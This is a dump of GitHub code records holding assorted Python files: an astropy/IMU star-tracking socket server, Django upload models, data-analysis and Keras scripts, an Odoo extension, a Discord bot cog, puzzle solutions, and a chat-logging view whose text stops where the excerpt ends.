+{"seq_id":"10044486758","text":"from http import client\nimport socket\nimport json\nimport imufusion\nimport numpy\nimport astropy\nfrom astropy.io import ascii\nfrom astropy.coordinates import EarthLocation, SkyCoord, AltAz\nfrom astropy import units\n\n\n# Return the RA and DES of a celestial object from its HR number (Polaris is HR 424)\n# Return format: the first item is RA, the second item is DES\ndef get_ra_and_des(hr_num):\n    # Read the catalog file and extract the matching row\n    table = ascii.read(\"catalog\", readme=\"ReadMe\")\n    table.add_index('HR')\n    row = table.loc[hr_num]\n    # Extract the RA and DES returned by the query\n    ret = []\n    ret.append(str(row[table.index_column('RAh')])+'h'+str(row[table.index_column('RAm')])+'m'+str(row[table.index_column('RAs')])+'s')\n    ret.append(str(row[table.index_column('DEd')])+'d'+str(row[table.index_column('DEm')])+'m'+str(row[table.index_column('DEs')])+'s')\n    return ret\n\n\n# Compute the horizontal (alt/az) coordinates of an object from its RA/DES, elevation, longitude, latitude and time (Polaris is HR 424)\n# Parameter format: longitude and latitude are in degrees, east longitude is positive, west longitude is negative\n# Return format: the first item is ALT, the second item is AZ\ndef get_skycoord(ra_des, longitude, latitude, height, time):\n    # Build the observer\n    observer = EarthLocation(lat=latitude*units.deg, lon=longitude*units.deg, height=height*units.m)\n    # Build the target object\n    opt_target = SkyCoord(ra=ra_des[0], dec=ra_des[1], unit=(units.hourangle, units.deg))\n    astropy.utils.iers.conf.auto_download = False\n    astropy.utils.iers.conf.remote_timeout = 0.0\n    astropy.utils.iers.conf.iers_degraded_accuracy = \"ignore\"\n    astropy.utils.iers.conf.auto_max_age = None\n    opt_pos = opt_target.transform_to(AltAz(obstime=time, location=observer))\n    ret = [opt_pos.alt.deg, opt_pos.az.deg]\n    return ret\n\n\ndef get_opt_altaz(hr_num, longitude, latitude, height, time):\n    ra_des = get_ra_and_des(hr_num)\n    return get_skycoord(ra_des, longitude, latitude, height, time)\n\n\n# Expected format:\n# opt_altaz: in degrees, obtained directly\n# gyro: (25, 3) numpy.array, columns ordered x, y, z\n# acc: (25, 3) numpy.array, columns ordered x, y, z\n# Return value is an int in the range [0, 255]\ndef get_diff_level(opt_altaz, gyro, acc, ahrs=imufusion.Ahrs()):\n    for i in range(0, 25):\n        ahrs.update_no_magnetometer(gyro[i, : ], acc[i, : ], 1 / 250)\n    head_euler = ahrs.quaternion.to_euler()\n\n    # print(head_euler)\n\n    # head_euler[2] = yaw, head_euler[1] = pitch; all angles are in degrees, so convert to radians for numpy trig\n    distance = numpy.arccos(numpy.cos(numpy.radians(opt_altaz[0]))*numpy.cos(numpy.radians(head_euler[1]))*numpy.cos(numpy.radians(opt_altaz[1]-head_euler[2]))+numpy.sin(numpy.radians(opt_altaz[0]))*numpy.sin(numpy.radians(head_euler[1])))\n    try:\n        ret_value = int(abs(distance) / numpy.pi * 255)\n    except ValueError:\n        print(\"ValueError Exception RAISED\")\n        return 0\n    else:\n        return ret_value\n\n\n# Create a socket object\nsocket_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nhost = \"192.168.217.30\"\nport = 9999\n# Bind the address\nsocket_server.bind((host, port))\n# Start listening\nsocket_server.listen(5)\n# socket_server.accept() returns a tuple: element 1 is the client socket object, element 2 is the client address (IP address, port number)\nclient_socket, address = socket_server.accept()\n\nflag = 1\nexcept_flag = 0\nopt_altaz = []\nret_value = 0\n\n# The while loop keeps the conversation going\nwhile True:\n\t# Receive the client's request\n    recvmsg = client_socket.recv(2048)\n    # Decode the received data\n    strData = recvmsg.decode(\"utf-8\")\n\n    try:\n        Data = json.loads(strData)\n    except json.JSONDecodeError:\n        print(\"Not valid JSON data, return last ret_value\")\n        except_flag = 1\n\n\n    # Set the exit condition\n    if strData == '':\n        client_socket, address = socket_server.accept()\n    elif except_flag == 0:\n        # print(\"Receive:\",Data)\n        print(end=\"\")\n    else:\n        print(\"Not valid JSON data, EXCEPTION RAISED\")\n    \n\n    if except_flag == 1:\n        msg = str(ret_value) + '\\n'\n        client_socket.send(msg.encode(\"utf-8\"))\n        except_flag = 0\n    else:\n        # Input\n        if flag:\n            opt_altaz = get_opt_altaz(424, 120.15, 30.25, 19.0, Data['time'])\n            flag = 0\n        # Process the received data\n\n        # Process the gyroscope data\n        pro_gyro = numpy.zeros((25, 3))\n        for rows in range(25):\n            for i in range(3):\n                pro_gyro[rows][i] = Data['gyroData'][rows][i] / 4096\n        # Process the accelerometer data\n        pro_acc = numpy.zeros((25, 3))\n        for rows in range(25):\n            for i in range(3):\n                pro_acc[rows][i] = Data['accelData'][rows][i] / 16.384\n\n        # print(pro_gyro)\n        # print(pro_acc)\n        ret_value = get_diff_level(opt_altaz, pro_gyro, pro_acc)\n        print(ret_value)\n\n        msg = str(ret_value) + '\\n'\n        # Send the data; it must be encoded\n        client_socket.send(msg.encode(\"utf-8\"))\n# Close the server\nsocket_server.close()\n\n","repo_name":"CSWellesSun/StarSeeker","sub_path":"Server/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"7166829763","text":"from django.db import models, transaction\nimport enum\nimport datetime\nimport os\nimport csv\nimport uuid\nimport json\nfrom django.contrib.auth.models import User\n\n\nclass FileUploadModel(models.Model):\n    class UploadStatus(models.IntegerChoices):\n        PENDING = 1\n        PROCESSED = 2\n        FAILED = 3\n\n    file_path = models.CharField(max_length=255)\n    uploaded_by = models.ForeignKey(\"auth.User\", on_delete=models.SET_NULL, null=True)\n    upload_date = models.DateTimeField(auto_now_add=True)\n    upload_status = models.IntegerField(\n        choices=UploadStatus.choices, default=UploadStatus.PENDING\n    )\n    processing_message = models.TextField(blank=True, null=True)\n    num_records = models.PositiveIntegerField(default=0)\n    start_date_time = models.DateTimeField(null=True)\n    end_date_time = models.DateTimeField(null=True)\n\n    @property\n    def filename(self):\n        return os.path.basename(self.file_path)\n\n    def create_file_upload_model(self, user_id, filepath):\n        return FileUploadModel.objects.create(\n            file_path=filepath, uploaded_by=User.objects.get(pk=user_id)\n        )\n\n    def mark_processed(self, num_records):\n        self.upload_status = self.UploadStatus.PROCESSED\n        self.end_date_time = datetime.datetime.now()\n        self.num_records = num_records\n        self.processing_message = None\n        self.save()\n\n    def mark_failed(self, message):\n        self.upload_status = self.UploadStatus.FAILED\n        self.processing_message = message\n        self.save()\n\n    def upload_json(self, body):\n        self.start_date_time = datetime.datetime.now()\n        customers = []\n        num_records = 0\n\n        try:\n            with open(self.file_path, \"rb\") as f:\n                decoded_file = json.load(f)\n\n            for row in decoded_file:\n                customer = Customer(\n                    first_name=row.get(\"first_name\", None),\n                    last_name=row.get(\"last_name\", None),\n                    national_id=row.get(\"national_id\", None),\n                    birth_date=row.get(\"birth_date\", None),\n                    address=row.get(\"address\", None),\n                    country=row.get(\"country\", None),\n                    phone_number=row.get(\"phone_number\", None),\n                    email=row.get(\"email\", None),\n                    finger_print_signature=str(uuid.uuid1()),\n                )\n                customers.append(customer)\n                num_records += 1\n\n            with transaction.atomic():\n                Customer.objects.bulk_create(customers, ignore_conflicts=True)\n        except Exception as e:\n            self.mark_failed(str(e))\n            raise CreateCustomerException(\n                f\"Error occurred while creating customer records: \\n {str(e)}\"\n            )\n        else:\n            self.mark_processed(num_records)\n\n    def upload(self):\n        self.start_date_time = datetime.datetime.now()\n        customers = []\n        num_records = 0\n\n        try:
            with open(self.file_path, \"rb\") as f:\n                decoded_file = f.read().decode(\"utf-8\").splitlines()\n                reader = csv.DictReader(decoded_file)\n\n            for row in reader:\n                customer = Customer(\n                    first_name=row.get(\"first_name\", None),\n                    last_name=row.get(\"last_name\", None),\n                    national_id=row.get(\"national_id\", None),\n                    birth_date=row.get(\"birth_date\", None),\n                    address=row.get(\"address\", None),\n                    country=row.get(\"country\", None),\n                    phone_number=row.get(\"phone_number\", None),\n                    email=row.get(\"email\", None),\n                    finger_print_signature=str(uuid.uuid1()),\n                )\n                customers.append(customer)\n                num_records += 1\n\n            with transaction.atomic():\n                Customer.objects.bulk_create(customers, ignore_conflicts=True)\n        except Exception as e:\n            self.mark_failed(str(e))\n            raise CreateCustomerException(\n                f\"Error occurred while creating customer records: \\n {str(e)}\"\n            )\n        else:\n            self.mark_processed(num_records)\n\n\nclass Customer(models.Model):\n    first_name = models.CharField(max_length=30)\n    last_name = models.CharField(max_length=30)\n    national_id = models.CharField(max_length=30)\n    birth_date = models.DateField(db_index=True)\n    address = models.CharField(max_length=30)\n    country = models.CharField(max_length=30)\n    phone_number = models.CharField(max_length=20)\n    email = models.EmailField(max_length=50)\n    finger_print_signature = models.CharField(max_length=50)\n    created_at = models.DateTimeField(auto_now_add=True)\n    updated_at = models.DateTimeField(auto_now=True)\n\n    class Meta:\n        indexes = [\n            models.Index(fields=[\"first_name\"]),\n            models.Index(fields=[\"last_name\"]),\n            models.Index(fields=[\"national_id\"]),\n            models.Index(fields=[\"birth_date\"]),\n            models.Index(fields=[\"address\"]),\n            models.Index(fields=[\"country\"]),\n            models.Index(fields=[\"phone_number\"]),\n            models.Index(fields=[\"email\"]),\n        ]\n\n        constraints = [\n            models.UniqueConstraint(fields=[\"national_id\"], name=\"unique_national_id\"),\n            models.UniqueConstraint(\n                fields=[\"phone_number\"], name=\"unique_phone_number\"\n            ),\n            models.UniqueConstraint(fields=[\"email\"], name=\"unique_email\"),\n        ]\n\n    def __str__(self):\n        return f\"Name: {self.first_name} {self.last_name}, ID: {self.national_id}\"\n\n\nclass CreateCustomerException(Exception):\n    def __init__(self, message):\n        super().__init__(message)\n\n\nclass FileUploadException(Exception):\n    def __init__(self, message):\n        super().__init__(message)\n","repo_name":"erickmwarama2/pbp_project","sub_path":"pbp_project/fileupload/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"4639171221","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n        migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Group',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('group_type', models.CharField(max_length=20, choices=[(b'editorial_group', b'Editorial Group'), (b'review_committee', b'Review Committee'), (b'generic', b'Generic')])),\n                ('name', models.CharField(max_length=200)),\n                ('active', models.BooleanField(default=True)),\n            ],\n        ),\n        migrations.CreateModel(\n            name='GroupMembership',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, 
auto_created=True, primary_key=True)),\n ('added', models.DateField(auto_now=True)),\n ('group', models.ForeignKey(to='manager.Group')),\n ('user', models.ForeignKey(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"StuJ/rua","sub_path":"src/manager/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"31637638670","text":"import asyncio\nimport socket\n\nfrom LIB.DB import DB\nfrom LIB.ENCRYPTOR import ENCRYPTOR\n\n\nclass SOCKET:\n def __init__(self):\n self.TASKS = []\n\n self.ENCRYPTOR = ENCRYPTOR()\n\n self.data_base = DB\n\n self.main_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n self.main_loop = asyncio.get_event_loop()\n\n async def send_data(self, data: bytes, client_socket: socket.socket):\n await self.main_loop.sock_sendall(client_socket, data)\n\n async def receive_data(self, client_socket: socket.socket) -> bytes:\n receive_data: bytes = await self.main_loop.sock_recv(client_socket, 1024)\n return receive_data\n\n async def receive_loop(self, client_socket: socket.socket = None):\n raise NotImplementedError\n\n async def send_loop(self):\n raise NotImplementedError\n\n async def main(self):\n raise NotImplementedError\n\n def start(self):\n raise NotImplementedError\n","repo_name":"Chedroni/Messanger","sub_path":"LIB/SOCKET.py","file_name":"SOCKET.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"71261344635","text":"# https://www.hackerrank.com/challenges/s10-standard-deviation/problem\n\nimport math\n\nn = int(input())\nnumbers = list(map(int, input().split()))\n\nmean = sum(numbers) / n\nsquared_distances = [(num - mean) ** 2 for num in numbers]\nstd = math.sqrt(sum(squared_distances) / n)\n\nprint(\"{:.1f}\".format(std))\n","repo_name":"harshildarji/10-Days-of-Statistics","sub_path":"Day 1/standard_deviation.py","file_name":"standard_deviation.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"69989886717","text":"from matplotlib import pyplot as plt\nfrom sklearn import linear_model\nfrom sklearn.metrics import accuracy_score\nimport numpy as np\nimport seaborn as sns\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\n\nNUM_FEATURE = 11\n\ndef get_data():\n wine_data = np.genfromtxt('../data/winequality-white.csv',delimiter=';')\n #return np.delete(wine_data,(0),axis=0)\n \n return wine_data\n\ndef normalise(data):\n return (data - data.mean())/data.std() \n\ndef normalise_all(data):\n for i in range(NUM_FEATURE):\n data[:,i] = normalise(data[:,i])\n return data\n\ndef get_correlation_matrix(data,fig_num):\n data = np.delete(data,-1,axis=1)\n \n df = pd.DataFrame(data=data)\n \n fig = plt.figure(fig_num)\n ax = fig.add_subplot(111) \n cax = ax.matshow(df.corr())\n fig.colorbar(cax)\n return\n\ndef visualise_data(x,y,fig_num):\n sz = np.array([0.2 for x in range(len(y))])\n fig = plt.figure(fig_num)\n for i in range(NUM_FEATURE):\n ax = fig.add_subplot(2,6,i+1)\n x_norm = normalise(x[:,i])\n ax.scatter(x_norm,y,sz) \n ax.set_ylim([0,10])\n ax.set_xlim(xmin=0)\n \n return\n\ndef get_data_plot(data,fig_num):\n data = np.delete(data,(0),axis=0)\n \n x,y = np.hsplit(data,[NUM_FEATURE])\n \n visualise_data(x,y,fig_num)\n return\n\n\ndef get_corr_coef(x,y):\n coef_array = 
np.corrcoef(np.transpose(x),np.transpose(y)) \n return coef_array[0,1]\n \n\ndef get_data_output_correlation_plot(data,fig_num):\n data = np.delete(data,(0),axis=0)\n x,y = np.hsplit(data,[NUM_FEATURE])\n x = normalise_all(x)\n corr = np.array([get_corr_coef(x[:,i],y) for i in range(NUM_FEATURE)])\n x_axis = np.arange(NUM_FEATURE)\n\n plt.figure(fig_num)\n plt.bar(x_axis,corr)\n return\n\ndef get_output_dist(data,fig_num):\n data = np.delete(data,(0),axis=0)\n x,y = np.hsplit(data,[NUM_FEATURE])\n \n fig = plt.figure(fig_num)\n sns.distplot(np.transpose(y))\n\n return\n\ndef get_feature_dist(data,fig_num):\n data = np.delete(data,(0),axis=0)\n x,y = np.hsplit(data,[NUM_FEATURE])\n\n x = normalise_all(x)\n\n fig = plt.figure(fig_num)\n \n for i in range(NUM_FEATURE):\n ax = fig.add_subplot(2,6,i+1)\n sns.distplot(np.transpose(x[:,i]))\n \n return \n\n#TODO: find a way of removing outliers whilst preserving largest data set\ndef remove_outliers(data):\n pass\n\n''' \n x_ = [[x] for i in range(11)]\n for j in range(11): \n for i in range(len(y)):\n if int(y[i]) != j:\n x_[j].delete(i,axis=0)\n x_ = np.append(x_[int(y[i])],x[i])\n'''\n\nif __name__==\"__main__\":\n data = get_data()\n #get_lin_regr(data)\n print(len(data))\n ''' \n get_correlation_matrix(data,1)\n get_data_plot(data,2)\n get_data_output_correlation_plot(data,3)\n get_output_dist(data,4) \n get_feature_dist(data,5)\n '''\n plt.show()\n\n","repo_name":"AlexMontgomerie/ML","sub_path":"src/data_analysis.py","file_name":"data_analysis.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"96"} +{"seq_id":"71296524797","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import UserError\nfrom odoo.tools.float_utils import float_compare\nfrom datetime import datetime, date\nfrom dateutil.relativedelta import relativedelta\nimport calendar\nimport pytz\n\nclass purchase_order_line(models.Model):\n _inherit = 'purchase.order.line'\n\n @api.onchange('product_id')\n def onchange_product_id(self):\n # print ('--ON CHANGE')\n res = super(purchase_order_line, self).onchange_product_id()\n fpos = self.order_id.fiscal_position_id\n for line in self:\n # print ('--CHECK PARTNER')\n # case1-not enable then do nothing (OK)\n # case2-enable and don't set on partner then get false (OK)\n # case3-enable and set partner tax and create directly on purchase\n # case4-enable and set partner tax and create from purchase request\n if self.env.user.company_id.is_vat_by_partner and line.order_id.partner_id:\n # print('---UPDAT TAX')\n if line.order_id.partner_id.supplier_taxes_id:\n line.taxes_id = fpos.map_tax(line.order_id.partner_id.supplier_taxes_id)\n else:\n line.taxes_id = False\n return res\n\n\nclass PurchaseOrder(models.Model):\n _inherit = 'purchase.order'\n\n # inter company rules\n @api.model\n def _prepare_sale_order_line_data(self, line, company, sale_id):\n # print('_prepare_sale_order_line_data res :', line, company, sale_id)\n res = super(PurchaseOrder, self)._prepare_sale_order_line_data(line, company, sale_id)\n # print('_prepare_sale_order_line_data res :', res)\n if sale_id:\n so = self.env[\"sale.order\"].sudo(company.intercompany_user_id).browse(sale_id)\n fpos = so.fiscal_position_id or so.partner_id.property_account_position_id\n if so.company_id.is_vat_by_partner and so.partner_id and so.partner_id.taxes_id:\n taxes = fpos.map_tax(so.partner_id.taxes_id)\n res['tax_id'] = [(6, 0, taxes.ids)]\n\n return 
res\n","repo_name":"support-itaas/app_shop","sub_path":"vat_by_partner/models/purchase_order.py","file_name":"purchase_order.py","file_ext":"py","file_size_in_byte":2091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"31062250301","text":"import collections\n\ndef RemoveDuplicates(ary):\n\n    final_dict = collections.OrderedDict()\n    for elem in ary:\n        final_dict[elem] = 0\n    return final_dict.keys()\n\nif __name__ == \"__main__\":\n    ary = [1, 1, 1, 2, 2, 3, 5, 5, 7, 7, 7, 8, 9, 10, 34, 34, 56, 56, 56]\n    print(RemoveDuplicates(ary))","repo_name":"suscaria/python3","sub_path":"kartik_sayee/remove_duplicates_list.py","file_name":"remove_duplicates_list.py","file_ext":"py","file_size_in_byte":304,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"}
+{"seq_id":"39950992217","text":"from discord.ext import commands\nimport discord\nfrom datetime import datetime\nfrom collections import OrderedDict\n\n#consts\nthumbsUp = '\\N{THUMBS UP SIGN}'\nxButton = '❌'\nnReacts = [\n    '1️⃣','2️⃣','3️⃣','4️⃣','5️⃣','6️⃣','7️⃣','8️⃣','9️⃣'\n]\nico = \"https://cdn.discordapp.com/attachments/808832489459023913/813049155957424168/unknown.png\"\n\nclass ACommands(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n        #\"command\":\"desc\"\n        self.commands = OrderedDict()\n        self.commands['hmw'] = \"Create a homework assignment\"\n        self.commands['openGroup #'] = \"Open the voice channel of specified group (# = group number)\"\n        self.commands['closeGroup #'] = \"Close the voice channel of specified group (# = group number)\"\n        self.messageActions = None\n\n    #sends the menu in ctx if ctx is channel actions\n    async def ShowCommands(self, ctx):\n        if ctx.channel.name == \"actions\":\n            strDsc = \"React to one of the presented options to initiate the command\"\n            embedActions = discord.Embed(title=\"Available Actions\", description=strDsc, color=0xe0d122)\n            embedActions.set_thumbnail(url=ico)\n            i = 0\n            for cmdName, cmdDsc in self.commands.items():\n                embedActions.add_field(name=\"!\"+cmdName, value=nReacts[i] + \" :\" + cmdDsc + \"\\n\\n\\n\", inline=False)\n                i+=1\n            self.messageActions = await ctx.channel.send(embed=embedActions)\n            i=0\n            for cmdName in self.commands.items():\n                await self.messageActions.add_reaction(nReacts[i])\n                i+=1\n    \n    @commands.command()\n    async def actions(self, ctx):\n        await self.ShowCommands(ctx)\n    \n    @commands.Cog.listener()\n    #reaction listener\n    async def on_reaction_add(self, reaction, user):\n        if reaction.message == self.messageActions and not user.bot:\n            await reaction.remove(user)\n            index = nReacts.index(reaction.emoji)\n            command = list(self.commands.items())[index][0]\n            found = False\n            for cmd in self.bot.commands:\n                if cmd.name == command: \n                    found = True\n                    break \n                else: continue\n            if found == False:\n                await reaction.message.channel.send(xButton + \" incorrect bot command provided\")\n            else:\n                await cmd.__call__(reaction.message.channel)\n\n    \n","repo_name":"william-fecteau/Chelper","sub_path":"cogs/actionCommands.py","file_name":"actionCommands.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"}
+{"seq_id":"70859431042","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 10 23:55:52 2020\n\n@author: Dicken\n\"\"\"\n\n# Import the required libraries\nimport matplotlib.pyplot as plt # visualize data as plots\nimport numpy as np # manipulate matrices and arrays\nimport pandas as pd # data analysis, cleaning and preparation\nimport seaborn as sns # create common statistical plots\n#scikit-learn\nimport sklearn\n# Import the dataset\n#data = pd.read_csv('bank-full.csv', sep=';') // First dataset with 45,000 observations\ndata = pd.read_csv('bank.csv')\ndata.rename(columns={'deposit': 'y'}, inplace=True)\n\n# Independent variables\nX = data.iloc[:, :-1].values\n\n# Dependent variable\ny = data.iloc[:, -1].values\n\n# Encoding the Independent Variable\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom sklearn.compose import ColumnTransformer\n\n# Dependent variable (target)\nlabelencoder_y = LabelEncoder()\ny = labelencoder_y.fit_transform(y)\n\n# Independent variables to encode as 0 and 1\n\n# Variable default\nlabelencoder_X_default = LabelEncoder()\nX[:, 4] = labelencoder_X_default.fit_transform(X[:, 4])\n\n# Variable housing\nlabelencoder_X_housing = LabelEncoder()\nX[:, 6] = labelencoder_X_housing.fit_transform(X[:, 6])\n\n# Variable loan\nlabelencoder_X_loan = LabelEncoder()\nX[:, 7] = labelencoder_X_loan.fit_transform(X[:, 7])\n\n# Variables to encode into several columns\n# Using OneHotEncoder() and ColumnTransformer\nlabelencoder_X_job = LabelEncoder()\nX[:, 1] = labelencoder_X_job.fit_transform(X[:, 1])\n\n# Using OneHotEncoder() and ColumnTransformer\nlabelencoder_X_marital = LabelEncoder()\nX[:, 2] = labelencoder_X_marital.fit_transform(X[:, 2])\n\nlabelencoder_X_education = LabelEncoder()\nX[:, 3] = labelencoder_X_education.fit_transform(X[:, 3])\n\nlabelencoder_X_contact = LabelEncoder()\nX[:, 8] = labelencoder_X_contact.fit_transform(X[:, 8])\n\nlabelencoder_X_month = LabelEncoder()\nX[:, 10] = labelencoder_X_month.fit_transform(X[:, 10])\n\nlabelencoder_X_poutcome = LabelEncoder()\nX[:, 15] = labelencoder_X_poutcome.fit_transform(X[:, 15])\n\n#t = X.select_dtypes(exclude=['int64'])\n\n\ncolumtransform = ColumnTransformer(\n    [('one_hot_encoder', OneHotEncoder(), [1, 2, 3, 8, 10, 15])], # The column numbers to be transformed (here is [0] but can be [0, 1, 3])\n    remainder='passthrough' # Leave the rest of the columns untouched\n)\n\nX = np.array(columtransform.fit_transform(X), dtype=float)\n\n# Splitting the dataset into the Training set and Test set\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, random_state = 0)\nprint (X_train)\n\n# Feature Scaling\nfrom sklearn.preprocessing import StandardScaler\nsc = StandardScaler()\nX_train = sc.fit_transform(X_train)\nX_test = sc.transform(X_test)\n\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n# Initialize the network\nclassifier = Sequential()\n\nclassifier.add(Dense(units=8, activation=\"relu\", kernel_initializer=\"uniform\", input_dim=48))\n\n# Second hidden layer\nclassifier.add(Dense(units=8, activation=\"relu\", kernel_initializer=\"uniform\"))\n\n# Output layer\nclassifier.add(Dense(units=1, activation=\"sigmoid\", kernel_initializer=\"uniform\"))\n\n# Compile the neural network\nclassifier.compile(optimizer='adam', loss=\"binary_crossentropy\", metrics=[\"accuracy\"])\n\n# Model summary\nprint(classifier.summary())\n\n# Train the neural network\nclassifier.fit(X_train, y_train, batch_size=10, epochs=1000)\n\n# Predicting the Test set results\ny_pred = classifier.predict(X_test)\n\n# Classify with a 50% threshold\ny_pred= (y_pred > 0.5)\n\n# Making the Confusion 
Matrix\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(y_test, y_pred)\n","repo_name":"D-kn/Data-Mining-Project_Bank-Marketing","sub_path":"ANN_FD.py","file_name":"ANN_FD.py","file_ext":"py","file_size_in_byte":3801,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"98"} +{"seq_id":"25043106408","text":"def potion(hp, pot):\n if hp + pot > 100:\n healing_amount = 100 - hp\n else:\n healing_amount = pot\n hp += healing_amount\n print(f\"You healed for {healing_amount} hp.\")\n print(f\"Current health: {hp} hp.\")\n return hp\n\n\ndef chest(coins, treasure):\n if treasure > 0:\n coins += treasure\n print(f\"You found {treasure} bitcoins.\")\n return coins\n\n\ndef fight(hp, monster_name, monster_damage, room):\n if hp - monster_damage <= 0:\n print(f\"You died! Killed by {monster_name}.\\nBest room: {room + 1}\")\n exit()\n hp -= monster_damage\n print(f\"You slayed {monster_name}.\")\n return hp\n\n\nhealth = 100\nbitcoins = 0\nlevels = input().split(\"|\")\n\nfor level in range(len(levels)):\n event = levels[level].split()\n command, number = event[0], int(event[1])\n\n if command == \"potion\":\n health = potion(health, number)\n elif command == \"chest\":\n bitcoins = chest(bitcoins, number)\n else:\n health = fight(health, command, number, level)\nelse:\n print(\"You've made it!\")\n print(f\"Bitcoins: {bitcoins}\\nHealth: {health}\")\n","repo_name":"PaolaG365/PythonCourses","sub_path":"PythonFundamentalsMay2023/MidExams/Mu_online.py","file_name":"Mu_online.py","file_ext":"py","file_size_in_byte":1106,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"98"} +{"seq_id":"5623799998","text":"from puzzle import Puzzle\n\nclass P3(Puzzle):\n\n def __init__(self, part):\n Puzzle.__init__(self, 3, part)\n \n def priorite_lettre(self, lettre):\n code = ord(lettre)\n code_a = ord('a')\n code_A = ord('A')\n return code - code_A + 27 if code < code_a else code - code_a + 1\n \n def solve_a(self, filename):\n total = 0\n with open(filename) as datas:\n for ligne in datas:\n m = len(ligne) // 2\n s = set(ligne[:m]) & set(ligne[m:-1])\n total += self.priorite_lettre(s.pop())\n return total\n \n def solve_b(self, filename):\n total = 0\n with open(filename) as datas:\n ligne = datas.readline()\n while ligne:\n s = set(ligne.strip())\n for _ in range(2):\n s = s & set(datas.readline().strip())\n total += self.priorite_lettre(s.pop())\n ligne = datas.readline()\n return total\n \n def solve(self, filename):\n if self.part == 0:\n self.solution = self.solve_a(filename)\n else:\n self.solution = self.solve_b(filename)\n\np3one = P3(0)\np3one.validate()\np3two = P3(1)\np3two.validate()","repo_name":"sebhoa/aoc","sub_path":"2022/p03.py","file_name":"p03.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"98"} +{"seq_id":"43218936066","text":"import os\nimport json\nimport datetime\nfrom madliar.http.response import HttpResponse\n\nfrom etc.config import LOG_PATH\nfrom etc.log4 import logging\n\n\nclass supported_action(object):\n ActionDoesNotExisted = type(\"supported_action__ActionDoesNotExisted\", (Exception, ), {})\n __function = {}\n\n def __init__(self, action):\n self.__action = action\n\n def __call__(self, func):\n self.__class__.__function[self.__action] = func\n return func\n\n @classmethod\n def run(cls, action, *args, **kwargs):\n picked_func = cls.__function.get(action)\n if callable(picked_func):\n 
return picked_func(*args, **kwargs)\n else:\n raise cls.ActionDoesNotExisted\n\n\ndef record(request):\n if request.method.lower() != \"post\":\n return HttpResponse(\"\")\n\n action = request.POST.get(\"action\")\n try:\n http_response = supported_action.run(action, request)\n except supported_action.ActionDoesNotExisted:\n http_response = HttpResponse(\"Action does not support.\")\n\n return http_response\n\n\n@supported_action(\"chat_log\")\ndef add_chat_log(request):\n room_id = request.POST.get(\"room_id\")\n try:\n raw_msg_list = request.POST.get(\"msg_list\")\n msg_list = json.loads(raw_msg_list)\n except Exception as e:\n return HttpResponse(\"ERROR: %s\" % e)\n\n log_contents = []\n for msg in msg_list:\n datetime_str = msg.get(\"datetime_str\")\n user = msg.get(\"user\")\n ul = msg.get(\"ul\")\n decoration = msg.get(\"decoration\")\n dl = msg.get(\"dl\")\n raw_msg = msg.get(\"msg\")\n if not user or not raw_msg:\n continue\n\n log_contents.append(\n \"[%s][%-5s][%s %s] %s -> %s\\n\" % (datetime_str, ul, decoration, dl, user, raw_msg)\n )\n if not log_contents:\n return HttpResponse(\"\")\n\n file_name = os.path.join(LOG_PATH, \"chat_%s.log\" % room_id)\n content = \"\".join(log_contents).strip(\"\\n\")\n if not isinstance(content, unicode):\n content = content.decode(\"utf-8\", errors=\"replace\")\n with open(file_name, \"ab\") as f:\n print >> f, content.encode(\"utf-8\", errors=\"replace\")\n return HttpResponse(content)\n\n\n@supported_action(\"prize_log\")\ndef add_prize_log(request):\n try:\n count = int(request.POST.get(\"count\"))\n except Exception:\n return HttpResponse(\"Error count\")\n datetime_str = str(datetime.datetime.now())[:-3]\n provider = request.POST.get(\"provider\")\n prize_type = request.POST.get(\"type\")\n title = request.POST.get(\"title\")\n p_url = request.POST.get(\"url\")\n\n file_name = os.path.join(LOG_PATH, \"prize_accept.log\")\n content = \"[%s][%s][%s][%s][%s][%s]\" % (datetime_str, count, prize_type, provider, p_url, title)\n if not isinstance(content, unicode):\n content = 